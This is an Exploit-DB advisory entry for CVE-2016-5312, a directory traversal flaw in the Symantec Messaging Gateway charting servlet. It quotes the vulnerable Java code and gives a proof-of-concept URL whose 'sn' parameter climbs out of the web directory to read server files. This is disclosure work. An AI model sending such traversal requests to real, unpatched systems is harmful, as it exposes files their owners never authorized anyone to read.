Symantec Messaging Gateway 10.6.1 - Directory Traversal

EDB-ID:

40437

CVE:

2016-5312

EDB Verified:

Author:

R-73eN

Type:

webapps

Exploit:   /  

Platform:

Java

Date:

2016-09-28

Vulnerable App: 
# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
# 
#  ___        __        ____                 _    _  
# |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|
#
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests. 
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory. 
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
#
The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java
The vulnerable code is
extends HttpServlet {
    public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
        block6 : {
            try {
                String string = httpServletRequest.getParameter("sn"); 
                //**** Taking parameter "sn" and writing it to the "string variable"


                if (string == null) break block6;
                String string2 = string.substring(string.length() - 3);
                 
                byte[] arrby = (byte[])this.getServletContext().getAttribute(string); 
           
                //**** The string variable is passed here without any sanitanization for directory traversal
                //**** and you can successfully use this to do a directory traversal.
                
                if (arrby != null) {
                    httpServletResponse.setContentType("image/" + string2);
                    ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
                    httpServletResponse.setContentLength(arrby.length);
                    servletOutputStream.write(arrby);
                    this.getServletContext().removeAttribute(string);
                    break block6;
                }


POC: 
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services